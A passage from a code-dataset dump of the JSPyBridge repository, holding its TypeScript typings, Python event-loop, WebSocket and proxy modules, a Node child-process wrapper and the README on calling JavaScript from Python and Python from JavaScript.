expression_field.grid$({ columnspan: 4, ipadx: 70 })\n\n const buttons = [1, 2, 3, null, 4, 5, 6, null, 7, 8, 9, null, 0, '+', '-', null, '*', '/', '=']\n let row = 1\n let col = 0\n for (const button of buttons) {\n if (button == null) { row += 2; col = 0; continue }\n const button1 = await tk.Button$(gui, {\n text: ` ${button} `,\n fg: 'black',\n bg: 'red',\n command: () => press(button),\n height: 1,\n width: 7\n })\n await button1.grid({ row, column: col++ })\n }\n\n await gui.mainloop$({ $timeout: Infinity })\n}\nawait main()\npython.exit()\n" }, { "alpha_fraction": 0.6605977416038513, "alphanum_fraction": 0.6626588702201843, "avg_line_length": 32.86046600341797, "blob_id": 
"6f5d8ed380b898b8b87bf09e533b8e3b0f619629", "content_id": "9465fd5574182a1aa1182cf87d252e93893e28ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": true, "language": "TypeScript", "length_bytes": 2911, "license_type": "permissive", "max_line_length": 122, "num_lines": 86, "path": "/src/pythonia/index.d.ts", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/// <reference path=\"./py.stdlib.d.ts\" />\n\nexport function python<T extends PyTypeName>(type: T) : Promise<PyObjectType<T>>\n// Template function to evaulate Python code \nexport function py(tokens, ...replacements)\n\ninterface py {\n // Template function to exec() Python code\n exec(tokens, ...replacements): Promise<any>\n\n /**\n * Creates a Python Set, `set(1, 2, 3)`. Most APIs accept normal arrays, but some require set/tuple types.\n * @param items Items to include in this set\n */\n set(...items): Promise<any>\n \n /**\n * Creates a Python tuple, `tuple(1, 2, 3)`. Most APIs accept normal arrays, but some require set/tuple types.\n * @param items Items to include in this tuple\n */\n tuple(...items): Promise<any>\n\n /**\n * Same as Python's enumerate(). Used for for loops. For example,\n * ```js\n * for await (const entry of await py.enumerate(some_iter)) {\n * console.log(entry)\n * }\n * ```\n * @param item The Python object\n */\n enumerate(item): Promise<any>\n\n /**\n * The Python with statement, the first parameter is the Python object\n * and the second is the function, which takes a `handle` parameter. For example,\n * ```js\n * await py.with(open('someFile'), async (f) => {\n * await f.write('Hello world!')\n * })\n * ```\n */\n with(statement: PyObjectType<any>, callback: (handle: any) => Promise<void>): Promise<void>\n}\n\ninterface python {\n /**\n * This toggles \"Fast Mode\", where the bridge skips string serialization. With this enabled, when using console.log\n * you now need to await object.toString(). For example, \n * ```js\n * const res = await somePythonApi(); \n * console.log(await res.toString())\n * ```\n * @param value True or false\n */\n setFastMode(value: boolean): void\n\n\n /**\n * Change the Python process working dir. Allows for file system loads relative to the working dir.\n * @param path The path to set the work dir to. If blank, pick the current file's folder path.\n */\n cwd(path): void\n\n /**\n * Quits the Python process. You can also do `process.exit()` if you want to kill the current process, including Python.\n */\n exit(): void\n}\n\nexport class PyClass {\n /**\n * Creates a Python class. **You must use** `await MyClass.init()` when initializing, don't just do `new MyClass()`.\n * The JS constructor is called *before* the Python class has been `__init__`'ed. Your `init()` method is called\n * after the Python class has been constructed. \n * @param superclass The Python superclass you want to extend, optional. 
\n * @param superArguments The positional arguments you want to pass to the super `__init__`\n * @param superKeywordArguments The keyword arguments you want to pass to the super `__init__`\n */\n constructor(superclass: PyObjectType<any>, superArguments: [], superKeywordArguments: {})\n\n /**\n * This method is called after the Python class has been created.\n */\n init()\n}" }, { "alpha_fraction": 0.6958174705505371, "alphanum_fraction": 0.73384028673172, "avg_line_length": 23, "blob_id": "da46b88eccb141021de08b16e1fcaab9518d2036", "content_id": "af2943fa77fb2c61219eaa0ecd595a29b530dd11", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 52, "num_lines": 11, "path": "/examples/python/webserver.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time\nfrom javascript import require\nhttp = require('http')\n\ndef handler(this, req, res):\n res.writeHead(200, {'Content-Type': 'text/plain'})\n res.end('Hello World!')\n\nhttp.createServer(handler).listen(8080)\n# Keep the Python process alive\ntime.sleep(100)" }, { "alpha_fraction": 0.5796515345573425, "alphanum_fraction": 0.5836963057518005, "avg_line_length": 34.12568283081055, "blob_id": "78481ea2924d0681647a9436aef2d81b76ab5dfe", "content_id": "58260c0e519c48c7ecf1f128903a7657cb99ff79", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6428, "license_type": "permissive", "max_line_length": 106, "num_lines": 183, "path": "/src/javascript/events.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time, threading, json, sys\nfrom . import connection, config, pyi\nfrom queue import Queue\nfrom weakref import WeakValueDictionary\n\n\nclass TaskState:\n def __init__(self):\n self.stopping = False\n self.sleep = self.wait\n\n def wait(self, sec):\n stopTime = time.time() + sec\n while time.time() < stopTime and not self.stopping:\n time.sleep(0.2)\n if self.stopping:\n sys.exit(1)\n\n\nclass EventExecutorThread(threading.Thread):\n running = True\n jobs = Queue()\n doing = []\n\n def __init__(self):\n super().__init__()\n self.daemon = True\n\n def add_job(self, request_id, cb_id, job, args):\n if request_id in self.doing:\n return # We already are doing this\n self.doing.append(request_id)\n self.jobs.put([request_id, cb_id, job, args])\n\n def run(self):\n while self.running:\n request_id, cb_id, job, args = self.jobs.get()\n ok = job(args)\n if self.jobs.empty():\n self.doing = []\n\n\n# The event loop here is shared across all threads. All of the IO between the\n# JS and Python happens through this event loop. Because of Python's \"Global Interpreter Lock\"\n# only one thread can run Python at a time, so there are no race conditions to worry about.\nclass EventLoop:\n active = True\n queue = Queue()\n freeable = []\n\n callbackExecutor = EventExecutorThread()\n\n # This contains a map of active callbacks that we're tracking.\n # As it's a WeakRef dict, we can add stuff here without blocking GC.\n # Once this list is empty (and a CB has been GC'ed) we can exit.\n # Looks like someone else had the same idea :)\n # https://stackoverflow.com/questions/21826700/using-python-weakset-to-enable-a-callback-functionality\n callbacks = WeakValueDictionary()\n\n # The threads created and managed by this event loop.\n threads = []\n\n outbound = []\n\n # After a socket request is made, its ID is pushed to self.requests. Then, after a response\n # is received it's removed from requests and put into responses, where it should be deleted\n # by the consumer.
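\n #\n # Illustrative shapes (matching the code below): requests[42] -> [Event, timeout]\n # while a call is in flight; responses[42] -> (payload, Barrier) once the reply arrives.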
\n requests = {} # Map of requestID -> [threading.Event, timeout]\n responses = {} # Map of requestID -> (response payload, Barrier)\n\n def __init__(self):\n connection.start()\n self.callbackExecutor.start()\n self.pyi = pyi.PyInterface(self, config.executor)\n\n def stop(self):\n connection.stop()\n\n # === THREADING ===\n def newTaskThread(self, handler, *args):\n state = TaskState()\n t = threading.Thread(target=handler, args=(state, *args), daemon=True)\n self.threads.append([state, handler, t])\n return t\n\n def startThread(self, method):\n for state, handler, thread in self.threads:\n if method == handler:\n thread.start()\n return\n t = self.newTaskThread(method)\n t.start()\n\n # Signal to the thread that it should stop. No forcing.\n def stopThread(self, method):\n for state, handler, thread in self.threads:\n if method == handler:\n state.stopping = True\n\n # Force the thread to stop -- kill it if it hasn't exited once the deadline passes.\n def abortThread(self, method, killAfter=0.5):\n for state, handler, thread in self.threads:\n if handler == method:\n state.stopping = True\n killTime = time.time() + killAfter\n while thread.is_alive():\n time.sleep(0.2)\n if time.time() > killTime:\n thread.terminate()\n\n self.threads = [x for x in self.threads if x[1] != method]\n\n # Stop the thread immediately\n def terminateThread(self, method):\n for state, handler, thread in self.threads:\n if handler == method:\n thread.terminate()\n self.threads = [x for x in self.threads if x[1] != method]\n\n # == IO ==\n\n # `queue_request` pushes the payload onto the outbound queue and returns an\n # Event that the caller can block on until the matching response arrives\n def queue_request(self, request_id, payload, timeout=None):\n self.outbound.append(payload)\n lock = threading.Event()\n self.requests[request_id] = [lock, timeout]\n self.queue.put(\"send\")\n return lock\n\n def queue_payload(self, payload):\n self.outbound.append(payload)\n self.queue.put(\"send\")\n\n def await_response(self, request_id, timeout=None):\n lock = threading.Event()\n self.requests[request_id] = [lock, timeout]\n self.queue.put(\"send\")\n return lock\n\n def on_exit(self):\n if len(self.callbacks):\n config.debug(\"cannot exit because active callback\", self.callbacks)\n while len(self.callbacks) and connection.is_alive():\n time.sleep(0.4)\n time.sleep(0.4) # Allow final IO\n self.callbackExecutor.running = False\n self.queue.put(\"exit\")\n\n # === LOOP ===\n def loop(self):\n while self.active:\n # Wait until we have jobs\n self.queue.get(block=True)\n # Empty the jobs & start running stuff !\n self.queue.empty()\n\n # Send the next outbound request batch\n connection.writeAll(self.outbound)\n self.outbound = []\n\n # Iterate over the open threads and check if any have been killed, if so\n # remove them from self.threads\n self.threads = [x for x in self.threads if x[2].is_alive()]\n\n if len(self.freeable) > 40:\n # free is fire-and-forget (no ACK), so no real request id is needed\n self.queue_payload({\"r\": 0, \"action\": \"free\", \"ffid\": \"\", \"args\": self.freeable})\n self.freeable = []\n\n # Read the inbound data and route it to correct handler\n inbounds = connection.readAll()\n for inbound in inbounds:\n r = inbound[\"r\"]\n cbid = inbound[\"cb\"] if \"cb\" in inbound else None\n if \"c\" in inbound and inbound[\"c\"] == \"pyi\":\n j = inbound\n self.callbackExecutor.add_job(r, cbid, self.pyi.inbound, inbound)\n if r in self.requests:\n lock, timeout = self.requests[r]\n barrier = threading.Barrier(2, timeout=5)\n self.responses[r] = inbound, barrier\n 
del self.requests[r]\n lock.set() # release, allow calling thread to resume\n barrier.wait()\n" }, { "alpha_fraction": 0.5801056623458862, "alphanum_fraction": 0.5823063254356384, "avg_line_length": 24.52808952331543, "blob_id": "f360d5bdb558ec66600bebf3d18db123130b0cd5", "content_id": "8acb01624422439096ab2a06362b8f37b8fef081", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2272, "license_type": "permissive", "max_line_length": 83, "num_lines": 89, "path": "/src/pythonia/ws.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# WebSocket Interface for Python access\nfrom Bridge import Bridge\nfrom queue import Queue\nimport threading, json\nimport asyncio\nimport websockets\n\nloop = asyncio.get_event_loop()\nsendQ = asyncio.Queue()\n\n\nclass WsCom:\n recvQ = Queue()\n sendQ = Queue()\n socket = None\n\n def readline(self):\n return self.recvQ.get()\n\n # Submit a job to asyncio to send since we're in another thread\n def queue(self, what):\n if type(what) == str:\n w = what\n else:\n w = json.dumps(what)\n asyncio.run_coroutine_threadsafe(sendQ.put(w), loop)\n\n # asyncio wants to put a message into our read queue\n def put(self, what):\n self.recvQ.put(what)\n\n\nipc = WsCom()\nbridge = Bridge(ipc)\n\n\ndef ws_io():\n global ipc\n\n async def consumer_handler(websocket, path):\n async for message in websocket:\n print(\"<-\", message)\n ipc.recvQ.put(message)\n\n async def producer_handler(websocket, path):\n return True\n while True:\n message = await ipc.sendQ.get()\n # print(\"SENDING\", message)\n await websocket.send(message)\n await asyncio.sleep(1)\n\n async def handler(ws, path):\n print(\"new conn!\")\n while True:\n listener_task = asyncio.ensure_future(ws.recv())\n producer_task = asyncio.ensure_future(sendQ.get())\n\n done, pending = await asyncio.wait(\n [listener_task, producer_task], return_when=asyncio.FIRST_COMPLETED\n )\n for task in pending:\n task.cancel()\n\n if listener_task in done:\n message = listener_task.result()\n ipc.put(message)\n\n if producer_task in done:\n message = producer_task.result()\n await ws.send(message)\n\n start_server = websockets.serve(handler, \"localhost\", 8768)\n loop.run_until_complete(start_server)\n loop.run_forever()\n\n\ndef com_io():\n while True:\n data = ipc.readline()\n if not data:\n break\n j = json.loads(data)\n bridge.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n\n\ncom_thread = threading.Thread(target=com_io, args=(), daemon=True)\ncom_thread.start()\nws_io()\n" }, { "alpha_fraction": 0.5356627106666565, "alphanum_fraction": 0.538552463054657, "avg_line_length": 32.68584060668945, "blob_id": "24fbc498d3372539d3890b00bd5381c66f03a66a", "content_id": "95bcc44b149ccf641721daa35fa1a17eb3ce4bb5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7613, "license_type": "permissive", "max_line_length": 100, "num_lines": 226, "path": "/src/pythonia/proxy.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time, threading, json\nimport json_patch\n\ndebug = lambda *a: a\n# debug = print\n\n\nclass JavaScriptError(Exception):\n pass\n\n\n# This is the Executor, something that sits in the middle of the Bridge and is the interface for\n# Python to JavaScript. 
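Every operation (get, init, inspect, serialize, keys, raw) becomes one JSON request tagged with a unique id, and the reply is matched back by that id. 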
The Executor is also used by the bridge to call Python from Node.js.\nclass Executor:\n def __init__(self, loop):\n self.loop = loop\n self.queue = loop.queue_request\n self.i = 0\n\n def ipc(self, action, ffid, attr, args=None):\n self.i += 1\n r = self.i # unique request id, used to match the response\n l = None # the lock\n if action == \"get\": # return obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"get\", \"ffid\": ffid, \"key\": attr})\n if action == \"init\": # return new obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"init\", \"ffid\": ffid, \"key\": attr, \"args\": args})\n if action == \"inspect\": # return require('util').inspect(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"inspect\", \"ffid\": ffid, \"key\": attr})\n if action == \"serialize\": # return JSON.stringify(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"serialize\", \"ffid\": ffid})\n if action == \"keys\":\n l = self.queue(r, {\"r\": r, \"action\": \"keys\", \"ffid\": ffid})\n if action == \"raw\":\n # (not really a FFID, but request ID)\n r = ffid\n l = self.loop.queue_request_raw(ffid, args)\n\n # Listen for a response\n while True:\n j = self.loop.read()\n if j[\"r\"] == r: # if this is a message for us, OK, return to the Python caller\n break\n else: # The JS API we called wants to call a Python API... so let the loop handle it.\n self.loop.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n if \"error\" in j:\n raise JavaScriptError(f\"Access to '{attr}' failed:\\n{j['error']}\\n\")\n return j\n\n def pcall(self, ffid, action, attr, args, timeout=10):\n \"\"\"\n This function does a one-pass call to JavaScript. Since we assign the FFIDs, we do not\n need to send any preliminary call to JS. We can assign them ourselves.\n\n We simply iterate over the arguments, and for each of the non-primitive values, we\n create new FFIDs for them, then use them as a replacement for the non-primitive arg\n objects. 
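For example, a Proxy argument serializes to its existing {\"ffid\": n} reference, plain JSON values pass through untouched, and any other object is assigned a fresh FFID (see ser() below). 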
We can then send the request to JS and expect one response back.\n \"\"\"\n self.ctr = 0\n self.i += 1\n requestId = self.i\n packet = {\n \"r\": self.i,\n \"c\": \"jsi\",\n \"p\": 1,\n \"action\": action,\n \"ffid\": ffid,\n \"key\": attr,\n \"args\": args,\n }\n\n def ser(arg):\n if hasattr(arg, \"ffid\"):\n return {\"ffid\": arg.ffid}\n else:\n # Anything we don't know how to serialize -- exotic or not -- treat it as an object\n return {\"ffid\": self.new_ffid(arg)}\n\n payload = json.dumps(packet, default=ser)\n\n res = self.ipc(\"raw\", requestId, attr, payload)\n\n return res[\"key\"], res[\"val\"]\n\n def getProp(self, ffid, method):\n resp = self.ipc(\"get\", ffid, method)\n return resp[\"key\"], resp[\"val\"]\n\n def setProp(self, ffid, method, val):\n self.pcall(ffid, \"set\", method, [val])\n return True\n\n def callProp(self, ffid, method, args, timeout=None):\n resp = self.pcall(ffid, \"call\", method, args, timeout)\n return resp\n\n def initProp(self, ffid, method, args):\n resp = self.pcall(ffid, \"init\", method, args)\n return resp\n\n def inspect(self, ffid, mode):\n resp = self.ipc(\"inspect\", ffid, mode)\n return resp[\"val\"]\n\n def keys(self, ffid):\n return self.ipc(\"keys\", ffid, \"\")[\"keys\"]\n\n def free(self, ffid):\n self.i += 1\n try:\n l = self.queue(self.i, {\"r\": self.i, \"action\": \"free\", \"args\": [ffid]})\n except ValueError: # Event loop is dead, no need for GC\n pass\n\n def new_ffid(self, for_object):\n self.loop.cur_ffid += 1\n self.loop.m[self.loop.cur_ffid] = for_object\n return self.loop.cur_ffid\n\n def get(self, ffid):\n return self.loop.m[ffid]\n\n\nINTERNAL_VARS = [\"ffid\", \"_ix\", \"_exe\", \"_pffid\", \"_pname\", \"_es6\", \"~class\", \"_Keys\"]\n\n# \"Proxy\" classes get individually instantiated for every thread and JS object\n# that exists. 
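Attribute access, item access, iteration, assignment and calls each become one Executor round-trip. 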
It interacts with an Executor to communicate.\nclass Proxy(object):\n def __init__(self, exe, ffid, prop_ffid=None, prop_name=\"\", es6=False):\n self.ffid = ffid\n self._exe = exe\n self._ix = 0\n #\n self._pffid = prop_ffid if (prop_ffid != None) else ffid\n self._pname = prop_name\n self._es6 = es6\n self._Keys = None\n\n def _call(self, method, methodType, val):\n this = self\n\n debug(\"MT\", method, methodType, val)\n if methodType == \"fn\":\n return Proxy(self._exe, val, self.ffid, method)\n if methodType == \"class\":\n return Proxy(self._exe, val, es6=True)\n if methodType == \"obj\":\n return Proxy(self._exe, val)\n if methodType == \"inst\":\n return Proxy(self._exe, val)\n if methodType == \"void\":\n return None\n if methodType == \"py\":\n return self._exe.get(val)\n else:\n return val\n\n def __call__(self, *args, timeout=10):\n mT, v = (\n self._exe.initProp(self._pffid, self._pname, args)\n if self._es6\n else self._exe.callProp(self._pffid, self._pname, args, timeout)\n )\n if mT == \"fn\":\n return Proxy(self._exe, v)\n return self._call(self._pname, mT, v)\n\n def __getattr__(self, attr):\n # Special handling for new keyword for ES5 classes\n if attr == \"new\":\n return self._call(self._pname if self._pffid == self.ffid else \"\", \"class\", self._pffid)\n methodType, val = self._exe.getProp(self._pffid, attr)\n return self._call(attr, methodType, val)\n\n def __getitem__(self, attr):\n methodType, val = self._exe.getProp(self.ffid, attr)\n return self._call(attr, methodType, val)\n\n def __iter__(self):\n self._ix = 0\n if self.length == None:\n self._Keys = self._exe.keys(self.ffid)\n return self\n\n def __next__(self):\n if self._Keys:\n if self._ix < len(self._Keys):\n result = self._Keys[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n elif self._ix < self.length:\n result = self[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n\n def __setattr__(self, name, value):\n if name in INTERNAL_VARS:\n object.__setattr__(self, name, value)\n else:\n return self._exe.setProp(self.ffid, name, value)\n\n def __setitem__(self, name, value):\n return self._exe.setProp(self.ffid, name, value)\n\n def __contains__(self, key):\n return True if self[key] is not None else False\n\n def valueOf(self):\n ser = self._exe.ipc(\"serialize\", self.ffid, \"\")\n return ser[\"val\"]\n\n def __str__(self):\n return self._exe.inspect(self.ffid, \"str\")\n\n def __repr__(self):\n return self._exe.inspect(self.ffid, \"repr\")\n\n def __json__(self):\n return {\"ffid\": self.ffid}\n\n def __del__(self):\n self._exe.free(self.ffid)\n" }, { "alpha_fraction": 0.5210319757461548, "alphanum_fraction": 0.5215927958488464, "avg_line_length": 22.460525512695312, "blob_id": "b5d6c400854b7726709771caabbd49fb509a0bcb", "content_id": "becf35469d65bcb36514715ed078c93737e34673", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1783, "license_type": "permissive", "max_line_length": 105, "num_lines": 76, "path": "/src/pythonia/StdioCom.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const cp = require('child_process')\nconst { join } = require('path')\n\nconst log = process.env.DEBUG ? console.log : () => {}\n\nclass StdioCom {\n constructor () {\n this.start()\n }\n\n start () {\n this.handlers = {}\n const args = [join(__dirname, 'interface.py')]\n const stdio = process.versions.electron ? 
'pipe' : ['pipe', 'inherit', 'pipe']\n try {\n this.proc = cp.spawn(process.env.PYTHON_BIN || 'python3', args, { stdio })\n } catch (e) {\n if (e.code === 'ENOENT' && !process.env.PYTHON_BIN) this.proc = cp.spawn('python', args, { stdio })\n else throw e\n }\n this.proc.stderr.on('data', buf => {\n const data = String(buf)\n for (const line of data.split('\\n')) {\n let recv = line\n try {\n if (line.startsWith('{\"r\"')) {\n recv = JSON.parse(line)\n this.recieve(recv)\n } else if (line) {\n console.warn('[PyE]', line)\n }\n } catch {\n console.warn('[PyE]', line)\n }\n }\n })\n if (process.versions.electron) this.proc.stdout.pipe(process.stdout)\n }\n\n end () {\n this.proc.kill()\n this.proc = null\n }\n\n recieve (j) {\n log('[py -> js]', j)\n if (this.handlers[j.c]) {\n return this.handlers[j.c](j)\n }\n if (this.handlers[j.r]) {\n if (this.handlers[j.r](j)) {\n return\n }\n delete this.handlers[j.r]\n }\n }\n\n register (eventId, cb) {\n this.handlers[eventId] = cb\n }\n\n write (what, cb) {\n log('[js -> py]', what)\n const fb = JSON.stringify(what)\n this.proc.stdin.write(fb + '\\n')\n if (cb) this.register(what.r, cb)\n }\n\n writeRaw (what, r, cb) {\n log('[js -> py]', what)\n this.proc.stdin.write(what + '\\n')\n this.register(r, cb)\n }\n}\n\nmodule.exports = { StdioCom }\n" }, { "alpha_fraction": 0.7277875542640686, "alphanum_fraction": 0.7312968373298645, "avg_line_length": 37.81424331665039, "blob_id": "bcac136964a1178a4e2ff44fdb4131cc9d3086bd", "content_id": "02304fdf9f2077c11bf94f54e3046f66456e79d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12628, "license_type": "permissive", "max_line_length": 333, "num_lines": 323, "path": "/README.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# JSPyBridge\n[![NPM version](https://img.shields.io/npm/v/pythonia.svg)](http://npmjs.com/package/pythonia)\n[![PyPI](https://img.shields.io/pypi/v/javascript)](https://pypi.org/project/javascript/)\n[![Build Status](https://github.com/extremeheat/JSPyBridge/workflows/Node.js%20CI/badge.svg)](https://github.com/extremeheat/JSPyBridge/actions/workflows/)\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/extremeheat/jspybridge)\n\n\n\nInteroperate Node.js and Python. You can run Python from Node.js, *or* run Node.js from Python. **Work in progress.** \n\nRequires Node.js 16 and Python 3.8 or newer.\n\n## Key Features\n\n* Ability to call async and sync functions and get object properties with a native feel\n* Built-in garbage collection\n* Bidirectional callbacks with arbitrary arguments\n* Iteration and exception handling support\n* Object inspection allows you to easily `console.log` or `print()` any foreign objects\n* (Bridge to call Python from JS) Python class extension and inheritance. [See pytorch and tensorflow examples](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/pytorch-train.js).\n* (Bridge to call JS from Python) Native decorator-based event emitter support\n* (Bridge to call JS from Python) **First-class Jupyter Notebook/Google Colab support.** See some Google Colab uses below.\n\n\n## Basic usage example\n\nSee some examples [here](https://github.com/extremeheat/JSPyBridge/tree/master/examples). 
See [documentation](https://github.com/extremeheat/JSPyBridge#documentation) below and [here](https://github.com/extremeheat/JSPyBridge/tree/master/docs).\n\n### Access JavaScript from Python\n\n\n```sh\npip3 install javascript\n```\n\n\n```py\nfrom javascript import require, globalThis\n\nchalk, fs = require(\"chalk\"), require(\"fs\")\n\nprint(\"Hello\", chalk.red(\"world!\"), \"it's\", globalThis.Date().toLocaleString())\nfs.writeFileSync(\"HelloWorld.txt\", \"hi!\")\n```\n\n### Access Python from JavaScript\n\nMake sure to have the dependencies installed beforehand!\n\n```sh\nnpm i pythonia\n```\n\n```js\nimport { python } from 'pythonia'\n// Import tkinter\nconst tk = await python('tkinter')\n// All Python API access must be prefixed with await\nconst root = await tk.Tk()\n// A function call with a $ suffix will treat the last argument as a kwarg dict\nconst a = await tk.Label$(root, { text: 'Hello World' })\nawait a.pack()\nawait root.mainloop()\npython.exit() // Make sure to exit Python in the end to allow node to exit. You can also use process.exit.\n```\n\n### Examples\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/extremeheat/jspybridge)\n\nCheck out some cool examples below! Try them on Gitpod! Click the Open in Gitpod link above, and then open the examples folder.\n\n\n[![PyTorch](https://www.vectorlogo.zone/logos/pytorch/pytorch-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/pytorch-train.js)\n[![numpy](https://www.vectorlogo.zone/logos/numpy/numpy-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/matplotlib.js)\n[![tensorflow](https://www.vectorlogo.zone/logos/tensorflow/tensorflow-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/tensorflow.js)\n[![mineflayer](https://www.vectorlogo.zone/logos/minecraft/minecraft-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/python/mineflayer.py)\n<!-- <img src=\"https://matplotlib.org/stable/_static/logo2_compressed.svg\" alt=\"matplotlib\" width=\"120\" height=\"70\">\n -->\n\n\n### Bridge feature comparison\n\nUnlike other bridges, you may notice you're not just writing Python code in JavaScript, or vice-versa. You can operate on objects\non the other side of the bridge as if the objects existed on your side. This is achieved through real interop support: you can call\ncallbacks, and do lossless function calls with any arguments you like (with the exception of floating point precision, of course).\n\n| | python(ia) bridge | javascript bridge | [npm:python-bridge](https://www.npmjs.com/package/python-bridge) |\n|---|---|---|---|\n| Garbage collection | ✔ | ✔ | ❌ |\n| Class extension support | ✔ | Not built-in (rare use case), can be manually done with custom proxy | ❌ |\n| Passthrough stdin | ❌ (Standard input is not piped to bridge processes. Instead, listen to standard input then expose an API on the other side of the bridge to receive the data.) 
| ❌ | ✔ |\n| Passthrough stdout, stderr | ✔ | ✔ | ✔ |\n| Long-running sync calls | ✔ | ✔ | ✔ |\n| Long-running async calls | ❌ (need to manually create new thread) | ✔ (AsyncTask) | ❌ (need to manually create new thread) |\n| Callbacks | ✔ | ✔ | ❌ |\n| Call classes | ✔ | ✔ | |\n| Iterators | ✔ | ✔ | ❌ |\n| Inline eval | ✔ | ✔ | |\n| Dependency Management | ❌ | ✔ | ❌ |\n| Local File Imports | ✔ | ✔ | ❌ |\n| Error Management | ✔ | ✔ | ✔ |\n| Object inspection | ✔ | ✔ | ❌ |\n\n## Who's using it\n* [PrismarineJS/mineflayer](https://github.com/PrismarineJS/mineflayer) -- [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/PrismarineJS/mineflayer/blob/master/docs/mineflayer.ipynb)\n\n# Documentation\n\n## From Python\n\nYou can import the bridge module with \n```py\nfrom javascript import require\n```\n\nThis will import the require function, which you can use just like in Node.js. This is a slightly\nmodified require function which does dependency management for you. The first parameter is the name\nor location of the file to import. Internally, this calls the ES6 dynamic `import()` function, which\nsupports both CommonJS and ES6 modules.\n\nIf you are passing a module name (does not start with / or include a .) such as 'chalk', it will search \nfor the dependency in the internal node_module folder and if not found, install it automatically. \nThis install will only happen once; it won't impact startup afterwards.\n\nThe second parameter to the built-in require function is the version of the package you want, for\nexample `require('chalk', '^3')` to get a version greater than major version 3, just like you would\nif you were using `npm install`. It's recommended to only use the major version, as the name and version\nwill be internally treated as a unique package, for example 'chalk--^3'. If you leave this empty, \nwe will install the `latest` version instead, or use the version that may already be installed globally.\n\n### Usage\n\n* All function calls to JavaScript are thread synchronous\n* ES6 classes can be constructed without new\n* ES5 classes can be constructed with the .new pseudo method\n* Use the `@On` decorator when binding event listeners. Use `off()` to disable it.\n* All callbacks run on a dedicated callback thread. DO NOT BLOCK in a callback or all other events will be blocked. Instead:\n* Use the @AsyncTask decorator when you need to spawn a new thread for an async JS task; a rough sketch follows.\n
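\nA minimal sketch of a long-running task, assuming the `@AsyncTask(start=True)` form documented in docs/python.md; the `task` handle mirrors the library's TaskState, with a `stopping` flag and a cooperative `sleep()`:\n\n```py\nfrom javascript import AsyncTask\n\n@AsyncTask(start=True)\ndef poll(task):\n # Runs on its own thread, so the shared callback thread is never blocked\n while not task.stopping:\n task.sleep(1) # cooperative sleep; the task exits promptly when stopped\n```\n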
\nFor more, see [docs/python.md](https://github.com/extremeheat/JSPyBridge/blob/master/docs/python.md).\n\n### Usage\n\n<details>\n <summary>👉 Click here to see some code usage examples 👈</summary>\n\n### Basic import\n\nLet's say we have a file in JS like this called `time.js` ...\n```js\nfunction whatTimeIsIt() {\n return (new Date()).toLocaleString()\n}\nmodule.exports = { whatTimeIsIt }\n```\n\nThen we can call it from Python!\n```py\nfrom javascript import require\ntime = require('./time.js')\nprint(time.whatTimeIsIt())\n```\n\n### Event emitter\n\n*You must use the provided On and Once decorators and the off function instead of the normal dot methods.*\n\nemitter.js\n```js\nconst { EventEmitter } = require('events')\nclass MyEmitter extends EventEmitter {\n counter = 0\n inc() {\n this.emit('increment', ++this.counter)\n }\n}\nmodule.exports = { MyEmitter }\n```\n\nlistener.py\n```py\nfrom javascript import require, On, off\nMyEmitter = require('./emitter.js')\n# New class instance\nmyEmitter = MyEmitter()\n# Decorator usage\n@On(myEmitter, 'increment')\ndef handleIncrement(this, counter):\n print(\"Incremented\", counter)\n # Stop listening. `this` is the this variable in JS.\n off(myEmitter, 'increment', handleIncrement)\n# Trigger the event handler\nmyEmitter.inc()\n```\n\n### ES5 class\n\nes5.js\n```js\nfunction MyClass(num) {\n this.getNum = () => num\n}\nmodule.exports = { MyClass }\n```\n\n\nes5.py\n```py\nMyClass = require('./es5.js')\nmyClass = MyClass.new(3)\nprint(myClass.getNum())\n```\n\n### Iteration\nitems.js\n```js\nmodule.exports = { items: [5, 6, 7, 8] }\n```\n\nitems.py\n```py\nitems = require('./items.js')\nfor item in items:\n print(item)\n```\n\n### Callback\n\ncallback.js\n```js\nexport function method(cb, salt) {\n cb(42 + salt)\n}\n```\ncallback.py\n```py\nmethod = require('./callback').method\n# Example with a lambda, but you can also pass a function ref\nmethod(lambda v: print(v), 2) # Prints 44\n```\n\n</details>\n\n## From JavaScript\n\n* All the Python APIs are async. You must await them all. 